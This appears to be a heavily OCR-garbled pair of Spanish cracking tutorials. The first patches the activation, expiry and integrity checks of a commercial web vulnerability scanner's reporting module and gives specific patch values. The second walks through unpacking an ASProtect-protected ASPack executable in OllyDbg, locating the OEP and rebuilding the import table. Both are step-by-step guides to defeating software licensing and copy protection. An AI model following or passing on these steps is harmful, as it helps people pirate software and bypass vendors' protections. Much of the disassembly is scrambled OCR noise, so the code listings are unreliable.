ASCII "llrite” 

ASCII "DatarGraphics*Reporterracu logo. png” 
ASCII A 


ASCII "csu” 

ASCII "reporter_” 

(Initial CPU selection) 

ASCII "Application must be activatedt” 
ASCII po exe” 

ASCII "ope 

ASCII sor lloatloo has been expiredt” 
ASCII "Application has been expiredt” 
SCII "Invalid passwordt"” 

ASCII "WUS Reporter” 


direccion donde esta el “activation.exe” 


¿DP lea: 


“consultant 


EAX DWORD PTR DS: [8FAEAA4A 1 
EAX DWORD PTR DS: [EAX 1 
BYTE PTR DS: [EAX+41, 
SHORT Reporter.B08E7AF5 
EAX DWORD PTR DS: [8FAB38 1 
EAX DWORD PTR DS: [EAX 1 
BYTE PTR DS: [EAX+301, 

JE SHORT Reporter.B08E7AB5 

MOU EAX,.DWORD PTR DS: [8FA038 1 

MOU EAX,.DWORD PTR DS: [EAX 1 

MOU EDX,Reporter.008E'EE8 ASCII "Application must be 

CALL Reporter.M08E2234 

JMP Reporter.BMB8E7DFB 


[PUSH Reporte PET 
LEA. EDX, mue RD PTR S BP-1C 1 
MOU EAX,.DWORD PTR DS: [SFA9BS ] 
MOU EAX . DUORD PTR DS: [EAX 1 
CALL A O 
WORD PTR S BI 

> ORI TT de B] 
CALL Reporter 80459488 
MOU EAX., DWORI B] 
CALL Reporter. 09495908 


Reporter .B08E7FBC ASCII "Activation.exe" 
Reporter .B08E7?F1C ASCII "open" 


CALL <JMP.S$shel132.ShellExecuteáA> 
JMP Reporter.M08E7DFB 
MO ED MIABn p 3 no - 


Veamos que es casi identica la rutina al otro ejecutable , en el 
offset 0x8E7A85 , intenta sacar el contenido de una direccion 
de memoria y de sacar sacar un buffer+4 y chequear que sea 
distinto a O o si no nos manda la ventanita de activacion que 
ya nos tiene locos , entonces coloquemos el cambio del valor 
al contenido del buffer 


Seguimos... 


DWORD PTR DS: [8FAEA4 1 
DWORD PTR DS:[EAX 1 
BYTE PTR DS: [EAX +48 1 


DWORD PTR DS: [8FAEA41 
DWORD PTR DS: [EAX 1 


DWORD PTR DS: [8FAEA41 
DWORD PTR DS: [EAX 1] 
DWORD PTR DS: [EAX+3C1 


Volvio a parar y hace una comparacion al buffer+48 sea igual 
a cero de caso contrario nos mandara mensajes de expiracion 
de la licencia , como vemos es casi identica la rutina de 
chequeo , seguimos. 


DWORD PTR DS: [8FAEA41 
DWORD PTR DS:[EAX 1 
DWORD PTR DS: [EAX+18 1 


DWORD PTR DS: [EBX+306] 


Aqui veamos hace un chequeo al buffer+10 y si recordamos 
en los chequeos del soft principal en el buffer+10 se 
encontraba el tipo de licencia y aqui tambien compara el tipo 
de licencia :) ,entonces el contenido del buffer debe valer 1, 
puff ni se molestaron en hacernos mas dificil el trabajo , 
entonces ya sabemos los datos del parcheo: 


buffer+4=1 
buffer+48=0 
buffer+10=1 


bien los parches la forma de parchear se me ocurrio que en el 
primer chequeo hacer lo mismo que con el parche anterior 
recuerdan? meter los datos que debe ir en cada direccion de 
memoria jejeje :D veamos: 


parche: 


ORIGINAL: 


DWORD PTR DS: [8FAEAA 1 

DWORD PTR DS:L[EAX ] 
BYTE PTR DS: [EAX+4] 

DWORD PTR DS: [8FAB38 1 

DWORD PTR DS:[EAX ] 
BYTE PTR DS:[EAX +38] 

DWORD PTR DS: [8FAB38 1 

DWORD PTR DS: [EAX 1 


DWORD PTR DS: [8FA9B8 1 
DWORD PTR DS: [EAX 1 


PARCHEADO: 


UYORD PIR D5: Lo 
DWORD PTR DS: [EAX 1 


BYTE PTR DS: [ESI+EDX-5Fl1 
BYTE PTR DS: [EAX+8B008F 1 


Lo mismo que como lo hicimos anteriormente, que metiera los 
datos a las direcciones de memoria y retornara por donde 
tiene que seguir su camino , comparen del original al 
parcheado y veraz exactamente la modificacion, OJO en ese 
ultimo salto debe ser un JMP no un JNZ como muestra 
la imagen , pues de lo contrario no tomara el salto , ahora 
guardamos los cambios y cargamos otra vez con el olly hasta 
ver este mensaje: 


Error 


) The file "Reporter2.exe” seems to be corrupt! 


Presionamos pause (f12) y ya sabemos lo que tenemos que 
hacer , vamos a esa direccion de memoria que nos muestra el 
call stack 


Y CTAECSOL]| MUIELIC. SS MAEEIOr MICELI. 11 tECTOS 
117742E836| user32.MessageBoxT imeoutl user32.7742E831 

:| 7742E9E4| ? user32.MessageBoxTimeoutA user32.7742E9DF 
:17742ER56| 7 user32. MessageBoxExA user32.7742EA51 
[00099000 | — hOwner = NULL 

| B1FFAGSS Text = "The file "Reporter2.exe” 

JJ 1515151=13] 

¡¡GOBBBB1O| —Sty = MB_OK¡MB_ ICONHAND:MB_APPL 

1100000BBB| Lan: gu agelD= 0 LLaNS NEUTRALT 

! 5 ? <JMP.tuser32.Messa A> Reporter. B0453AC0 


(5/5/5]5]515]515] hOwner = NULL 
B1FFAGSS Tegt = "The file "Reporter2.exe” 
[|BBBBBBBB| Title = NULL 
¡[BBB0BBB1O| Style = MB_OK; Le ICOMHAND : MB_APPLI 


| BB453FCO E Reporter. 08453 Reporter. B0453FBB 
110045543E|? Reporter. DOdESE9C Reporter. 00455439 
/680490517F 108 ludes Reporter. 1B045543E Reporter. 60405170 
:|604051E7| Reporter. 604051383 Reporter. B04651E2 
1|00407F6B| Reporter. 60405148 Reporter. 00407F66 
¡| BOSE7SAD| Reporter. BB4B7F2C Reporter. BBSE79A8 


Ya que seguimos la direccion en el disassembler , subimos y 
vemos la misma rutina que verifica el tamaño y demas cosas 
para saber si ha sido modificado el ejecutable , hacemos los 
mismos cambios que hicimos anteriormente , veamos 


DWORD PTR DS: [8EBBDC1 
DWORD PTR DS: LEAR ] 


OK , ahora guardamos los cambios y probamos el ejecutable 
“reporter.exe” 


a Ya 

Explorer Jnalscda |EB|¡DA|a mm -Q 

NVS Reporter 
=] Affected ltems Threat level 
=] Developer Report 
3] Executive Summary 


( fi1acunetix threat level 2 Acunetix Threat Level 3 


3] Quick Report Level 3: High One or more high-s everity type vu 
5] Compi o malicious user can exploit these y 
AN A and/or deface your website. 


3] Scan Comparison 
3] Monthly Vulnerabilities 


Bl] Report Preview | Alerts distribution 


3, Configuration 

- [Ef] Settinas Total alerts found 87 

-- 8 Database Explorer O High 35 IS 
O Medium 38 MOS 
O Low :m 
O informational o mu 


Alerts summary 


O Blind SQL Injection 
Affects 


LISTO , PERFECTO!!!, Quedo completamente funcional, y 
puedo generar reportes sin problema y todo lo que yo 
quiera :) , ahora si porfin puedo utilizar el software 
completamente full , sin tener que bajar activadores de la 
red , que ni siquiera se si son seguros. 


Este texto se alargo muchisimo debido a que me encontre 
muchas verificaciones que hacia el softare , algunos trucos 
anti-cracking que usa y es muy complicado escribir y 
debuggear al mismo tiempo , pero bueno hemos aprendido 
que no fue tan dificil atacar este software y eso que se 
dedican a la “seguridad” , por lo menos no fue tan dificil 
como me imagine al principio, espero que hayan llegado 
hasta aqui , aun no he probado al 100% el funcionamiento 
del software , pero si alguien descubre algo que se me haya 
pasado de largo , le agradeceria me lo hiciera saber , aunque 
intente que no se me fuera algun byte que despues causara 
problemas , espero les haya servido de mucho este escrito 


pues me ha costado no dormir en esta noche lo cual ahora me 


pondre a escanear unos cuantos sitios y listo. 


Agradecimientos: A todos los que alguna vez me apoyaron en 
seguir adelante y los que colaboraron conmigo en diferentes 
proyectos , familia ,amigos y a ti por leer este escrito. 


Alejandro Torres (torrescrack) 


e-mail: torrecrack248Q0hotmail.com 
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Borland Delphi He Mode 
D MPACAR CUTAB 


>) Cracker AGUML 


Antes de nada conozcamos a nuestro enemigo. Abrimos PETD y miramos a ver con que 
esta empacado y: 


ME PEID v0.9 


File: |C:jArchivos de programalASPack|ASPack.exe 


EP Section: 


File Offset: [00000400 First Bytes: (68,01,80,46 


Linker Info: (2,25 Subsystem: —Win32 GUI 


¡ASProtect 1.22 - 1,23 Beta 21 -> Alexey Solodovnikow 


Multi Scan | Task Viewer | Options About Exit | 


[Y Stay on top -> 
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Ufff, con lo poco que me gusta ese packer, jejeje. 
Bueno pues carguémoslo en Olly a ver que pasa: 


- [CPU - main thread, module ASPack] 


— File View a ds Options Window ES 


68 01804600 PUSH 4638601 


10401000 
1n4B 5/| ES B1000009 ASPack. 0040100B 
aBn4a - [==] 
1040 B Cc3 
OA C a E CMP ai ri PTR DS: [EDX+4EE02477] 
bind e 
04D 4| 3D 62110889 96381162 
0u40 9 1905 903509433 DWORD PTR DS: [33448090], EAXx 
aB4B1B1F| 45 BP 
pa4a a LOOPDE SHORT 6040102B ASPack. 0040102B 
0040 2 AND EAX, DWORD PTR DS: [ECXJ 
pa4a 4 SUB BYTE _PTR DS: [EDxX+48],DH 
0040 ? 7A 42 ASPack. B6040106B 
pa4a 5 BBAS_72438404A ¡(ADD BYTE PTR_DS: [ERAX+4A4048727, CH 
0040 BS 277CO1AC ADD EAX, ACB17C27 
0040 B247 s1 ADD AL,BYTE PTR DS: LEDI-7?FI 
Ban4a 63 BXx 
1045 E3 A6 
Bu4a 52 
0040 55 PUSH EBP 
an4B £BS5CD5 F2 EA IMUL EBX, DWORD PTR SS: CEBP+EDX*S-E],-16 
0040 55 PUSH _EBP 
40 INS DWORD PTR ES: CEDIJ,DX 1/0 command 
0040 INS DWORD PTR ES: CEDIJ,0X 1-0 command 
Bau4a SA POP EDX 
au4a D97D 75 FSTCW WORD_PTR_SS: [EBP+75] 
an40 395 BC MOU DWORD _PTR DS: [EDX-44],EBX 
Bu40 93 ACHG_EAX, EBX 
an4B 8121 1F4o8088 [AND DWORD PTR DS: TECX], 8380401F 
Bu4a 41 INC ECX 
Ba4a 15 041F491E ADC EAX, 1E491F04 ] , 
Ba4a C562 B2 LDS E FWORD_PTR_DS: [ED*+2] Modification of segment register 
pa4a ADC BYTE PTR DS: TECX1, CL 
0040 DEC ESI 
40 73 98 JNB SHORT _00400FFO ASPack . B00400FFO 
0040 3n22 CMP AH,BYTE PTR DS: [EDX] 
Bu4a FS sTC 
0040 6D INS DWORD PTR ES: CEDIJ,DX 140 command 
Bu4a DS BE AA 
0040 sE DUTS DX,BWTE PTR ES: [EDI] 140 command 
pu4a 5D POP EBP 
au4a AD LODS DWORD PTR DS: [ESI] 
Ba4a DF37 FBSTP TBYTE PTR DS: [EDI] 
pa4a 30 C? CMP AL,BCc? 
pu4a Te PF ASPack. 00401BEE 
Ba4a 110D ADC EBP,EBx 


Address | Hex dump 


Ahora usaremos el método que mas he visto y que a mi me ha dado resultado para 
llegar al OEP. Simplemente nos vamos a Options->Debugging Options o si lo prefieren 
Alt + O y dan en la pestaña Exceptions y dejan marcada solo la primera opción que 
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ES Debugging options 


[4 Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
T INT3 breaks 
T— Single-step break 
Memory access violation 
[Integer division by O 
Invalid or privileged instruction 
T ANFPU exceptions 


[Ignore also following custom exceptions or ranges: 


¿Add range | 


Undo | Cancel | 


Le dan a OK y ahora simplemente le dan a F9 y empiezan a pasar las excepciones con 
Shift +F7 y F9 y teniendo mucho cuidado al contar las excepciones hasta que el 
programa arranque (en mi caso fueron 26 excepciones). Ahora reiniciamos Olly con 
Ctrl. + F2 y hacemos lo mismo pero esta vez nos pararemos en la ultima excepción y le 
damos a Shift + F7 solo para pasarla. 

Ahora pulsamos Alt + M para sacar la ventana Memory Map y marcamos la sección 
.code del ejecutable y le ponemos un BP Memory on Access haciendo clic derecho 
sobre ella como se muestra en la imagen: 
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00020000 
00124000 
00128000 
00130000 
90140000 
00159000 
00250000 
00260000 
00270000 
00290000 
19 00200000 
y 00320000 
00330000 
00330000 
00390000 
003A0000 
00380000 
/551m]5]51%) 
00300008 
DO3ED00B 
DO3FOD06 
1400000 


p401000 
00443000 
00445000 
00446000 

44 00448000 
00444000 

:4f 00448000 
$ 0044C000 
00450000 
00468000 
00477000 
90450000 


FPUSH_ELA 


MOU ESP, EB! 


POP EBP 
RETN 


Y ahora demos a F9 y... 


MOU EAX, A PTR SS: [ESP] 


stack of ma 


PE header 
code 
data 


resources 
imports, Y 


EJ) 


(0 


MevicerHarddiskVolume 1 INDI 
MevicerHarddiskUo lume 1 INDC 
MevicerHarddiskUo lume 1 INDC 
MevicerHarddiskVo lume 1 1IND( 


MevicerHarddiskVo lume 1 INDI 


el 


A A A A A A 


G 


Actualize 

View in Disassembler Enter 

Dump in CPU 

Dump 

Search Ctri+B 

Set break-on-access F2 les, 


Set memory breakpoint on access 
Set memory breakpoint on write 


Set access > 
Conditional Branch Logger » 
Copy to clipboard > 
Sort by > 
ARA Sranca » 
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- [CPU - main thread, module ASPack] 
[e] File View Debug Plugins Options “Window Help 


dul + 1jejlmMtjwjn[c]o[k]8/r]-Js/ 32?) 


PUSH EBP A TR 


EAT! 


SBEC MOU EBP,ESP Ef 
8304 F4 ADD ESP, -4C Et 
ES 4DMBFCFF ASPack . 104033F4 Et 
BC21FCFF ASPack . 104049B3 Ef 
5 6354FCFF ASPack. 60407014 Es 
15] D6Có6FCFF ASPack . B04BEFSC Ef 
155] BDC?FCFF ASPack. 0040F078 ES 
15] BSE?FCFF ASPack.00415FCS El 
15] 974DFDFF ASPack. 00417650 7 
155] ES1AFEFF ASPack. 00424380 E 
155] F9S6FEFF ASPack . B042AFCS C 
1a]] ES99FEFF ASPack . 0042C2BC P 
la] 639AFEFF ASPack . 60420330 A 
[a] CEASFEFF ASPack . MM42CEAC > 
[515] SSABFEFF ASPack. 00420478 S 
15] 3BBAFEFF ASPack.0042E318 T 
[a]] 6FBAFEFF ASPack . 0042E35C D 
ala] FABAFEFF ASPack . 1042E3EC 0 
69E1FEFF ASPack . 004359960 3 
A4AFFFFF ASPack . 1043D8AD EF 
30564400 MOU EAX, OWORD PTR DS: [445630] S 
D210FEFF ASPack . 40423908 S 
33294400 MOU EDx, 442938 ASCII "ASPack” S 
30564400 MOU EAX, DWORD PTR DS: [445630] S 
ES DFODFEFF ASPack. 104236F4 S 
FF15 004944090 
Al 30564400 MOU EAX, DWORD PTR DS: [445630] : 
ES 5311FEFF ASPack. 0423478 S" 
ES D21BFCFF ASPack. 104044FC = 
S£BE5 Fe 
Ft 
DD BYTE PTR DS: CEAXJI, AL 
Unknown command 
Unknown command 
PUSH ES 
ADD BYTE PTR DS: [EAXJ,AL 
ADD BYTE PTR DS: [ECX+531,AL 
PUSH_EAX 
POPAD 
ARPL_ WORD PTR DS: [EBXJ,BP 
2945 ADD BYTE PTR DS: CEAXJ],AL 
EBP=0012FFFAO 
Address [Hex dump EX OZ] RETURN to kerneT32.7 


Ya estamos en el OEP y tiene buena pinta porque parece ser que no hay Stolen Bytes 
así que sigamos. 

Para encontrar la TIAT simplemente ponte encima de la primera CALL y das Intro a ver 
a donde nos lleva: 
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- [CPU - main thread, module ASPack] 


[c] File View Debug Plugins Options Window Help 


CLP EEES 1 Em)T/w/4/e17/K]8)R)-)8] ESA >| 


40 PUSH a A ¡Beats 
40 CALL 60481200 ASPack. 60401200 EC 7 
40 MOU DWORD PTR DS:[445014],EAX EDS * 
40 CALL 00461288 ASPack. 60401288 EBY +: 
40 8905 10504490 |MOU DWORD PTR DS:[44501CJ,EAX ESP É 
40 C705 18504400 1MOU DWORD PTR_DS:[4456181,0A ERP € 
40 ES 40314000 — |MOU EAX, 403140 ESI 7 
48 c3 RETN EDO 
40 2049 0n LEA EAX, DWORD PTR DS: CEAX] 

2040 53 PUSH_EBX EIP € 

3040 233D_D4534490 1CMP DWORD PTR DS: [4453D41,0 co 

3040 7D GA JGE SHORT 00403438 ASPack . 00403438 P1 

3040 ES E20000u8 — |MOU EAX,BE2 AD 

040 Es D9100000 — | CALL 00404511 ASPack . 00404511 20 
40 6s 6300008 | PUSH Ss 0 
40 6A 40 PUSH 40 16 
40 ES DCDEFFFF — |CALL-0a4B1320 ASPack. 00401320 DÓ 
48 88D8 MOU_EBX, EAX 06 
40 85DB TEST _EBX,EBX id 
40 75 BC JNZ SHORT 00483456 ASPack . 00403456 EFL € 
g40 ES E2000008 — |MOU EAX,BE2 

9048 ES ED100000 CALL BADASIL ASPack. 00404511 

9040 EB ac ASPack . 00403462 

040 53 PUSH_EBX 

0n40 Al D4534400 — |MOU EAX,DIWORD PTR DS: [445304] 

gu40 59 PUSH EAX 

gn40 ES S6DEFFFF — |CALL B604012E8 ASPack . 004012E8 
40 2910 90544490 |MOU DWORD PTR DS: [445490], EBXx 
40 5B POP. EBX 
48 C3 RETN 


H 
Do 


SECO 
SA0D 34504400 
8B05 D4534400 
38409 


MOU EAX, EAX 
MOU CL,BYTE PTR DS: [445034] 
ca ¿DWORD PTR DS: [445304] 


75 28 
64:8B15 2000001 MOU EDx, DWORD PTR FS: [20] 
28B0482 MOU EAX, DWORD PTR DS: CEDX+ER<*4] 


ELL ooagsszs 


C3 
ES 9SFFFFFF 
8B05 D4534400 


50 
ES 48DEFFFF 
8500 


Y4 Bl 
ca. 


EN E DWORD PTR DS: [445304] 


TEST EAX, EAX 


ASPack . 6640344 


ASPack . 600403424 


ASPack. 604012E0D 
ASPack . 00403490 


Address | Hex dump ASCII 


No se ve nada interesante pero como siempre se llama a alguna API muy cerca del 
OEP, pues probare a ver que hay dentro de esas CALLs. 
En la primera no hay tampoco nada interesante pero en la segunda salimos aquí: 
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- [CPU - main thread, module ASPack] 


[c] File View Debug Plugins Options Window Help 


med] et] vis 


al +] 1jejmjr]wju[c]7/k]8]R/-]s] 512] 


50614400 Regis 

MOU EAX, EAX EAN E 

58614400 | JMP DWORD _PTR DS: [446158] ECX + 

a MOU EAX, EAX EDX + 

a 54614400 | JMP DWORD PTR DS:[4461541] EBX 7 

' MOU EAX, EAX ESP É 

a 50614400 | JMP DWORD PTR DS: [446150] EBP É 

B MOU EAX, EAX ES1 

a 40614400 | JMP DWORD _PTR DS: [4461401] EDI 7 

a MOU EAX, EAX 

a C4614400 | JMP DWORD PTR DS: [446104] oleaut32.SysAl locStringLen EIP € 
040 MOU EAX, EAX Ca 
a4a C0614400 JMP DWORD PTR DS: [446100] oleaut32.SysStringLen P1 
940 MOU EAX, EAX A 
0040 ece614400 | JMP DWORD PTR DS: [446180] oleaut32.VariantClear 28 
Ta) MOU EAX, EAX SB 
an Bs614400 |JMP DWORD PTR DS: [446188] oleaut32.VariantCopyInd T0 
an MOU EAX, EAX DÓ 
an B4614400 JMP DWORD PTR DS: [446184] oleaut32.VariantChangeTypeEx 6 


1 
[a] 
< 
m 
D 
x 
m 
D 
x 


43614400 
44614400 
40614400 
30614400 
33614400 
34614400 
30614400 
20614400 


z 
o 
< 
m 
D 
x 
m 
D 
x 


mm 


E 
m 


DI 
EX 
[un] 
2 
m 
D 
x 
m 
D 
x 


ma 
o 
< 
m 
D 
x 
m 
D 
x 


DS 
Y 
o 
<< 
m 
D 
x 
m 
D 
x 


MO NNMAM 


UD 
m: 
[a] 
< 
m 
D 
xXx 
m 
D 
x 


E 
o 
< 
m 
D 
x 
m 
D 
x 
7 


Nod 
— 
0 
== 


DE 
z 
[a] 
E 
m 
D 
x 
m 
D 
x 


pa 
o 
d= 
m 
D 
Xx 
m 
D 
XxX 


, 


DOE 
a] 
+] 
17] 

LL 
m 
o 
xXx 


56 PUSH _ESI 
BE_3C544400 MOU ESTI, 445430 
833E 00 


o 
pu 4 
3 
2 
= 
o 
D 
o 
= 
pa] 
e] 
o 
un 
rm 
m 
10) 
. 
uu 
o 


57] 
[= 
11] 
2= 
o 
H 
Le 


ASPack . 6640136 


or 


Y5 3A 

63 44060000 

5A 4B PUSH O 

ES ASFFFFFF 

g8BC8 MOV _ECX, EAX 
8509 TEST _ECX,ECX 


ASPack. 66401320 


o 


y 


D?| RETURN to kernel32.7C811 
6F| RETURN to ntdll.7( 6l 


Bueno pues ya dimos con la zona caliente para dar con la TAT. Ahora nos ponemos 
encima de cualquiera de esos saltos incondicionales que empiezan con FF25 y nos 
vamos al panel que es la parte de debajo de la ventana Disassembler y hacemos clic 
derecho sobre el valor que se ve y elegimos Follow Address in Dump: 
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- [CPU - main thread, module ASPack] 


[c] File View Debug Plugins Options Window Help 


EXPBROMpor ER gobEbbEanEDEREARS Aa 


50614400 
a6 3 a , MOU EAX, ERX 


z 
o 
e 
m 
D 
Xx 
m 
D 
Xx 


Daba 


z 
[ua] 
= 
m 
D 
Xx 
m 
D 
x 


Dí o 
z Er 
o [a] 
=> = 
m m 
D D 
Xx XxX 
m m 
D D 
Xx Xx 


DI 
E 
o 
a 
m 
D 
x 
m 
D 
x 


oleaut32.SysAl locStrinaLen 


Dí 
z 
o 
= 
m 
D 
x 
m 
D 
x 


oleaut SysStringLen 


Y 
Y 


DA 


=: 
o 
] 
m 
D 
Xx 
m 
D 
X 


Dal 


) BC614400 


oleaut32.VariantClear 


Y 


z 
[a] 
= 
m 
D 
XxX 
m 
D 
Xx 


, B3614400 oleaut32.VariantCopy Ind 


3 
o 
= 
m 
D 
Xx 
m 
D 
Xx 


oleaut32.VariantChangeTypeEx 


Y 


DE 
== 
o 
= 
m 
D 
XxX 
m 
D 
Xx 


DI 
Sí 


1515) 


par 
o 
=> 
m 
D 
Xx 
m 
D 
X 


DA 


DO 
z 
[a] 
< 
m 
D 
x 
m 
D 
Xx 


Dado 
HD 
z 
[a] 
= 
m 
D 
xX 
m 
D 
Xx 


==: 
o 
j= 
m 
D 
Xx 
m 
D 
X 


Y 


DO 


¡DS 
z 
[a] 
q 
m 
D 
Xx 
m 
D 
x 


DO 


= 
o 
al 
m 
D 
XxX 
m 
D 
Xx 


m 
D 
x 


( 


r 


DD 
E 
o 
mu << 
m 
D 
Xx 


2 
=] 
117] 
225 
m 
[12] 
Xx 


PUSH_ESI 
MOU ESI, 445430 


Do 
o 
== 
3 
mm] 
E 
o 
D 
o 
= 
Pio 
pra] 
o 
= 
nm 
m 
10) 
a] 
pen 
o 


DOE 
DOE 
a 
= 
117) 
2 
m 
ES 
ES 
D 
m1) 
== 
w 
ho 
ho 
+ 
ho] 
w 
D 
T 


PUSH B 


MOU_ECX, EAX 
TEST _ECX, ECX 


Ne 
D 
ñ 
Ez 
w 
O 
o 
Do 
he 
non] 
pu 
1) 
ro 
ho] 


a] 


Copy pane to clipboard 
Modify data 


Y RETURN to kernel 


Cs16FD? 
y EF 


S 7 RETURN to ntdll. 

: a : 2| RETURN to ntdll 
; , ¿ETUR o ] 

als Follow value in Dump 0 B 7 

1515) 6F a 20 00 

90 38 a 45 OB0BBADA. A 

ls) Appearance > [20 a 20 añ 

aa cu yu 11] End of SEH cha 

aa = mE ” 50 O O 20 a a a le da =n h ot día 7 cnalr 

113] 2 a 20 20 20 a 20 20 An al lkerne 132.708 

[aa] BA Co|66 66 66 BB a 44 9 L BD A RATUa tcs 

151%] 660 560 60/66 66 66 Sa a 06 45 - 

Ba 1515] 566 66 B0/566 66 BA BA 66 66 AB 

an an 06 00 00/02 60 060 an sn Bn ASCII "hg” 

5] ab 66 60164 66 56 AB Bao an = = E Dd ' 

pla ga FF ga ga 04 a ga a FF ga ga + S + Ani SEEFE( MAIAIA LALALA LALA 


Y ya estamos en la IAT aunque tiene muy mala pinta y esta redireccionado casi todo 
hacia el Asprotect pero vamos a repararla. Lo primero es ver donde empieza y donde 
termina y para ello subamos buscando a ver si vemos una zona de 00000000 o vemos 
direcciones seguidas que no tengan referencias (para saber si un dword tiene 
referencias lo marcamos y hacemos Ctrl. + R y si sale la lista vacía es porque no es un 
dato valido de nuestra IAT y sobra así que si no se ve la zona de O0OOOO0000 
tendríamos que buscar el inicio de nuestra IAT mirando si los dwords tienen 
referencias o no. En este caso tenemos suerte y Podemos ver el comienzo de la IAT 
en 446128 : 
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m1 


1515] 


odo 


O 
E 


o 
Jr po o fo fo fo fo pra 


5 
o 
da 
ño 
do 
ña 
5 
ño 
sa 
e 
so 
ña 
do 
ño 
do 
a 
da 
5 
so 
ño 
da 
ño 
5 
0 
O 

E 
5 
E 


+tD04.CD4. 1Dú. ¿D4; 
DG. 04 .—Dú. 104. 
504. -D4.*D4.Efrx. 
DEú. 404. 1x, IE4 
(Eu. 4Eú.. HEú. TEú. 
“Eu. LEu. SEU. 1Ed. 
ñE4 4.2 Eu 


D 
a 
ha 
O 
a 

D 
a 
ha 
Co 

D 
a 
ha 

Nu] 
Ln] 
Er 
.n 
D 
1] 
pur] 
[o] 


Y 


m 
E 
ES 
h 
D 
0 
o 
o 
mn 
o 
ÉS 
H 
pon] 
0 
o 
o 
| 
o 
ÉS 
H 
un] 
0 
o 
o 
11] 
00 
[y] 
a] 
pa] 
m 
o 
po] 


JUANA 
Di 
D 
La 
ES 
La 
D 
0 
o 
o 
na] 
o 
ES 
h 
D 
0 
Da] 
o 
Le) 
La 
ES 
ES 
D 
1) 
o 
o 
o 
00 
ES 
ES 
D 
0 
o 
o 


DO 


eo. UJEUANEs 1% 
"LEWLKRW. EU ras 


O0DD 
ds o] 
mo 
Lo 
OS 
poo] 
No 
e o] 
Jo 
Dm 
“JD 
Ho 
mo 
poo] 
am 
y 
Ay 
Dr 
cm 
poa 
cm 
poro] 
sn 
y 
Sy 
mr 
35 
mea 
000 
os 
Dm 
da da] 
y 


B| mbú.PNu. TIN ¿Bos . 
704. O04.,04.S04. 
DO4.PO4.+04.hO4. 


Y 
Y 


Y 


604. 904.*04.+Pú. 
»Pú.LPú.(Pu.4Pú. 
GPú.LPú.....dlóv 
....S53PWriLw,3Lw 
3 MW... CH... 
TENIA 
DOI" uiyiwibdW. ... 


1 AAA 


Y 
Y 


y 


6 
[51] 
A 


y 
y 


Y 
Y 

Dí 

Dí 


o 
do 
Y 


E AAA 


y 
y 


DO) .oooococooooconoso 


DO) .oooooomoo...... 


DO) ..ooooooo oo. ..... 


DO) ..oooooosocoo.... 
1 AAA 
DO .ocococonconocco 
DO) .oooococonconoso 
DO) ..oooooooooo..... 


DO) ..ooooooo oo. ..... 


Entonces tenemos que: 

El OEP es 44289C 

El inicio de la IAT esta en 446128 

El fin de la IAT esta en 4466 A0 

Y su tamaño es el resultado de restarle al fin de la IAT el inicio de la TAT así que: 
Tamaño de la IAT = 446640 - 446128= 578 


A LA CAZA DEL CALL SEMI-MAGICO 


Ahora reiniciemos y vayamos a 44612C que es el principio de las direcciones que debe 
escribir en nuestra IAT y pongamos un Memory Breakpoint on Write: 
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mm 
o0N 
pu] 


H 
687, BL 


m 

- 

o TD 
3M 


Di Dn 
DNO 


kommand 


E] 


: Memory, on access 
Search for Memory, on write 
Find references Ctri4+R Ñ 

n , Hardware, on access 
View executable file 


Hardware, on write 
Copy to executable file y : 
Gabo Hardware, on execution 


DANDO 


Hex 

Text 

Short 

Long 

Float 
Disassemble 
Special 


Appearance 
a sal E ETURN to ASPack. 00468415 


to kern 
Y to ntdl 
to ntdl 


DN 


Y le damos a F9 y empezamos a pasar las excepciones otra vez igual que antes pero 
esta vez hay que tener mucho cuidado porque hay que contar muy bien las excepciones 
ya que te puedes equivocar y contar la parada en el BPM como si fuera una excepción. 


La primera vez que para por nuestro BPM es en : 
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ES RAFFFFFF E 
8040 00 LEA EAX, DWORD PTR DS: CEAXI h 
E] PUSH EAK E 
Es 42000000 [CALL BB9ESBBC E 
sFeg 04000000 |POP DWORD PTR DS:CEAX+41 . 
LEA EAX, DWORD PTR DS: CEAXI c 
PUSH ESI E 
PUSH_EDI E 
MOU ESI,EAX > 
MOU EDI, EDX E 
MOV EAX, ECX — 
CMP EDI,ESI É 
L 
SAR _ECX, 2 E 
den Ios 100RO EA US DWORD PTR ES:CEDIJ,DWORD PTR D: ¿ 
MOU ECX,EAX E 
AND ECX, 3 E 
REP MOUS BYTE PTR ES:[EDIJ,BYTE PTR DS: z 
POP EDI z 
POP ESI E 
RETN < 
SD740E FC LEA ESI,DWORD PTR DS: LESI+ECX-4] : 
8D7COF FC LEA EDI,DWORD PTR DS: CEDI+ECX-4] E 
SAR ECH, 2 F 
STD 
REP MOUS DWORD PTR ES: CEDIJ,DWORD PTR D' 
MOV ECX, EAX 
AND ECX, 3 
26 8306 03 ADD ESI,3 
ECR=00000735 (decimal 1845.) 
DS: [ES] ]=[00A30498]=00000000 
EDIJ=[0044612C ]=00000000 
. Y . Po 
Esta no nos interesa así que sigamos y recordad que esta vez que paro no la debéis 
contar ya que no fue una excepciona si que Sigamos: 
el en] vis] sol] + 1jelmitiwu]c]+[k]8[r]-/s] ¿=12] ES pa 
33DB X0R EBx,EBX 
SASD FF MOU BL,BYTE PTR SS: CEBP-11 A - 
8BCE MOU ECK, EBX EE pda 
3035 FFFEFFFF (LEA EAX, DWORD PTR SS: [EBP-101] BO44612C ASPack.B0446120 
2BD6 MOU EDx,ESI 3% ABBOBB1É 
ES 6B4BFFFF ' BB12FE1C 
6A GA PUSH_GA > ABÍ2FF2C 
82 B6399F00 MOV ECX, 2F39B6 BB12FE2B ASCII "DeleteClriticalSection” 
8803 MOV EDX, EBX POl2creo 
30385 FFFEFFFF [LEA EAX,DWORD PTR SS: [EBP-101] 
Es EBCAFFFF ' BBSEFICS 


808S FEFEFFFF 
8845 0C 

S6 

ES 1BFCFFFF 
ES, ZEFEFFFF 


3840 FF 

3035 FFFEFFFF 
3BD6 

ES 1M4BFFFF 
65A GA 

B9 AC399FD0B 
33D2 

'| 8855 FF 

| 8D85_FFFEFFFF 
|. ES 97CAFFFF 


¡4469 
612C]-00000009 


EEN o PTR SS: [EBP-101] 
MOU EAX, DWORD PTR SS: [EBP+CJ 
PUSH EAX 


MOU EDx, DWORD PTR DS: CEDIJ 
UY DUO! : [EDX1,EAX 


MOU AL,BYTE PTR DS: [ESIJ 

MOU BYTE PTR SS: [EBP-1],AL 
INC ESI 

XOR ECX, ECX 

MOU CL,BYTE PTR_SS: [EBP-1] 
LEA EAX, DWORD PTR SS: [EBP-101] 


mou roscas 

PUSH_GA 

MOU ECX, 9F39AC 

X0R EDX, EDX 

MOU DL,BYTE PTR_SS: [EBP-1] 


